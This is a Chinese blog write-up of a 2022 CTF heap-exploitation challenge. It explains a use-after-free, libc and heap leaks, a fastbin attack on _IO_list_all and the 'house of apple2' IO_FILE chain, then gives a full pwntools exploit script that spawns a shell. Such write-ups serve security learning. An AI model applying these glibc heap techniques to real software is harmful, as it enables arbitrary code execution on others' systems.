2022 网信柏鹭杯 pwn2 note2

最新推荐文章于 2023-06-08 14:45:22 发布
最新推荐文章于 2023-06-08 14:45:22 发布
阅读量639 收藏 2
点赞数 1
分类专栏: wp 文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/126910913
版权

2022 网信柏鹭杯 pwn2 note2

因2.34之后取消了malloc,free hook这两个在堆pwn中用的最多的hook,roderick师傅分享的house of apple学习了一下,是一个非常好用的调用链,包括house of emma, house of kiwi, house of banana, house of pig, house of cat都是极好的调用链,前天的网信柏鹭杯里的pwn2是2.35的,笔者学完apple之后这里拿的2.34做的,只需要改偏移就可以打通2.35的
在这里插入图片描述
漏洞点一个uaf
首先泄露出libc,和堆地址,填满tcache,就可以泄露出libc和heap了
因为要打io所以需要劫持一下io_list_all
这里笔者考虑的是fastbin attack,所以再一次填满了tcache,接着利用fastbin attack,将_IO_list_all劫持到堆上
接着就是house of apple了,移步roderick师傅的house of apple2详解,和2.24对vtable的绕过相似,笔者详细写过IO_FILE-2.24对vtable检测绕过、babyprintf、house of orange

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './note2'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote()
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = '> '

def add(index, size, content):
    r.sendlineafter(menu, '1')
    r.sendlineafter(menu, str(index))
    r.sendlineafter(menu, str(size))
    r.sendlineafter('Enter content: ', content)

def delete(index):
    r.sendlineafter(menu, '2')
    r.sendlineafter(menu, str(index))

def show(index):
    r.sendlineafter(menu, '3')
    r.sendlineafter(menu, str(index))

for i in range(8):
    add(i, 0x80, 'aaaa')
add(8, 0x80, 'bbbb')

for i in range(8):
    delete(i)

show(7)

unsortedbin_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
li('unsortedbin_addr = ' + hex(unsortedbin_addr))

libc = ELF('./libc.so.6')
libc_base = unsortedbin_addr - 0x1f2cc0
li('libc_base ' + hex(libc_base))
_IO_list_all = libc_base + libc.sym['_IO_list_all']
li('_IO_list_all = ' + hex(_IO_list_all))

show(0)
key = u64(r.recv(5).ljust(8, b'\x00'))
heap_base = key << 12
li('heap_base = ' + hex(heap_base))
system_addr = libc_base + libc.sym['system']

for i in range(8):
    add(i, 0x80, 'aaaa')

for i in range(8):
    add(i, 0x70, 'aaaa')

add(8, 0x70, 'aaaa')

for i in range(8):
    delete(i)

delete(8)
delete(7)

for i in range(7):
    add(i, 0x70, 'aaaa')

p1 = p64(key ^ _IO_list_all)
add(0, 0x70, p1)
add(1, 0x70, 'aaa')
add(2, 0x70, 'aaa')

target_addr = heap_base + 0xc30
add(0, 0x70, p64(target_addr))

_IO_wfile_jumps = libc_base + libc.sym['_IO_wfile_jumps']
li('_IO_wfile_jumps = ' + hex(_IO_wfile_jumps))

p2 = b'\x00'
p2 = p2.ljust(0x28, b'\x00') + p64(1)
p2 = p2.ljust(0xa0, b'\x00') + p64(target_addr + 0xe0)
p2 = p2.ljust(0xd8, b'\x00') + p64(_IO_wfile_jumps)
p2 = p2.ljust(0xe0 + 0xe0, b'\x00') + p64(target_addr + 0x210)

add(1, 0x200, p2)

one = [0xda7c1, 0xda7c4, 0xda7c8]
one_gadget = one[0] + libc_base

p3 = b'\x00'
p3 = p3.ljust(0x68, b'\x00') + p64(one_gadget)
add(2, 0x200, p3)

r.sendlineafter(menu, '4')

r.interactive()
z1r0.
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
习题-pwn2
m0_49959202的博客
09-18 133
文章目录pwn21.程序分析2.栈帧设计3.exp编写 pwn2 1.程序分析 首先file一下,发现是32位程序: checksec一下,发现pie关闭: ida分析程序,发现存在system函数,因此可以到plt内找到system: 分析vulnerable_function(),可以得到需要溢出的长度为0x88 + 4 =136+4 = 140,同时存在read(),可以用来溢出 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3YpmnStC-1631942444
2022柏鹭杯pwn复现
m0_63437215的博客
11-19 1356
2022柏鹭杯pwn
pwn2own
weixin_34367257的博客
04-04 1073
Pwn2Own是全球最著名的黑客大赛之一,由美国五角大楼入侵防护系统供应商TippingPoint的DVLabs赞助,今年已经是第六届。 1比赛规则 参赛黑客们的目标是4大主流网页浏览器——IE、Firefox、Chrome和Safari,平台是在安装安全更新的Windows 7操作系统下运行,Safari浏览器将在安装苹果Mac OS X 10.6雪豹操作系统下运作,顺利攻破一个主流浏览器便...
pwn2_sctf_2016
z1r0的博客
12-06 706
pwn2_sctf_2016 查看保护 这里的int给转换成了无符号的,输入-1的时候,值会变得很大,整型溢出。ret2libc即可 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 25828) else: r = process(file_name)
神州网信摄像头麦克风开启工具
08-05
【神州网信摄像头麦克风开启工具】是一款专为解决操作系统中摄像头和麦克风无法正常启用问题而设计的应用程序。在日常使用电脑时,摄像头和麦克风是进行视频通话、在线会议以及录制音频的重要硬件设备。当这些设备...
神州网信系统优化 v0.1.2神州网信系统优化 v0.1.2
09-08
《神州网信系统优化 v0.1.2详解与应用》 神州网信系统优化工具是一款专注于提升计算机系统性能和稳定性的软件,其版本号为v0.1.2。这款工具旨在帮助用户针对神州网信操作环境进行深度优化,以达到更流畅、高效的...
2020网信自主创新调研报告.pdf
05-18
2020网信自主创新调研报告
2022年智慧水利总体设计与水利网信补短行动方案.pptx
03-01
2022年智慧水利总体设计与水利网信补短行动方案.pptx 高清完整版
神州网信Win10如何改屏保.docx
03-26
### 如何在神州网信版Windows 10中更改屏保 #### 背景介绍 神州网信版Windows 10是一款专为中国市场定制的操作系统版本,它基于微软的Windows 10操作系统进行了一些定制化的调整和优化,旨在更好地满足中国用户的...
英招杯 pwn2(ret2shellcode)
qq_53928256的博客
11-16 292
由于程序运行时,即输出了输入值s的存放首地址,我们输入的首地址与shellcode之间的距离是0x3c-0x28=0x14,故只需返回s的首地址加上0x14即可;我们分析main函数的时候可以看到栈中的s距离rbp还有一段距离,且程序的NX保护未开启,我们可以考虑写入shellcode在栈中执行。根据图中与rbp的偏移,我们相对比较容易的出var_30对应的变量为v5,var_8对应的变量为v10。在网上我们可以查到相对较短的syscall系统调用的shellcode为23字节,满足我们所需的要求。
180509 Pwn-ISCC(Pwn2
whklhhhh的博客
05-25 866
写作Pwn3读作Pwn2 23333 打开pwn3反编译,发现菜单,很明显是堆的题目了 看了一下在free的时候没有清空指针,造成野指针 以我浅薄的知识猜想是double free吧 参考ctf-wiki的fastbin-attack 主要漏洞在于通过fastbin管理堆的情况下,在free时仅会检查链表头部(即main_arena指向)的chunk 第一次释放free(chun...
BUUCTF pwn pwn2_sctf_2016
菜的只能随便写写博客
02-18 2496
0x01 分析   0x02 运行  程序读入一个长度,然后按照长度读入后面输入的data并回显。   0x03 IDA  数据长度被限制为32,无法溢出,接着查看get_n函数。  接受a2个长度的字符串并放到vuln函数的缓冲区内部,但是a2传入的值类型是unsigned int,而前面判断长度的类型是int,可以规避长度限制。   0x04 思路  输入负数长度,绕过长度检查,执行r...
pwn(2)-栈溢出下
qq_73667990的博客
06-08 1389
只要我们通过特定的汇编代码把特定的寄存器设定为特定的值后,在调用int 80h执行sys_execve(“/bin/sh”,NULL,NULL)就可以获得shell了;64位程序传递参数不是直接通过栈,而是前六个参数通过寄存器,分别是RDI,RSI,RDX,RCX,R8,R9。不同内核态操作通过给寄存器设置不同的值,在调用指令int 80h,就可以通知内核完成不同的功能。2.ebx设为"/bin/sh"字符串的地址。2.RDI设为"/bin/sh"字符串的地址,RDI=&(“/bin/sh”)
BUUCTF pwn2_sctf2016
红叶的博客
11-01 484
本题难点:绕过字符串大小限制以及是否掌握了ret2libc。
[BMZCTF-pwn] 24-pwn2
weixin_52640415的博客
02-16 174
第二题是个栈溢出的题,也属于白送的那种,程序直接调用check在check里向48字节的空间写入0x400,导致栈溢出。而且没有canary没开pie这样就能直接通过溢出 int check() { char buf[48]; // [rsp+0h] [rbp-30h] BYREF read(0, buf, 0x400uLL); return strcmp(buf, "21232F297A57A5A743894A0E4A801FC3"); } 思路就是先通过溢出调用puts(got[pu
BUUCTF pwn——pwn2_sctf_2016
CNS-Enterprise BCC-1701-J
04-18 331
BUUCTF 做题练习
【CTF】pwn2_sctf_2016
凉水的博客
07-16 897
pwn2_sctf_2016
pwn之cgpwn2
qq_43430261的博客
10-22 735
https://blog.csdn.net/qq_43986365/article/details/94974853 https://blog.csdn.net/Closing_time/article/details/100428850 https://www.jianshu.com/p/3d19056282bf https://bbs.pediy.com/thread-254851.htm ...
网信杯网络安全ctf题库
最新发布
12-04
网信杯网络安全CTF题库是一套专门为网络安全竞赛设计的题目集合。这个题库涵盖了各种各样的网络安全知识和技能,包括密码学、漏洞利用、逆向工程、网络协议分析等方面的题目。参与者可以通过解答这些题目来提升自己的网络安全能力和技术水平。 这个题库的设计旨在挑战参与者的思维和解决问题的能力,需要他们灵活运用所学的知识和技能来解决各种复杂的网络安全难题。通过挑战题目,参与者可以不断地学习和提升自己的技能,同时也可以与其他网络安全爱好者进行交流和竞技,搭建网络安全学习和交流平台。 在网信杯网络安全CTF题库中,参与者可以选择不同类型和难度的题目来挑战自己,这有助于他们系统地学习和提高网络安全技能。而且,这个题库也是一个不断更新和完善的平台,可以不断添加新的题目,以及根据实际情况对已有的题目进行修改和更新,保证参与者能够接触到最新的网络安全知识和技能。 总的来说,网信杯网络安全CTF题库是一个非常有益的网络安全学习和竞赛平台,对于想要学习和提升网络安全技能的人来说,是一个很好的选择。通过参与这个题库,可以不断挑战自己,提高自己的网络安全水平,同时也可以和其他网络安全爱好者进行交流和学习。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值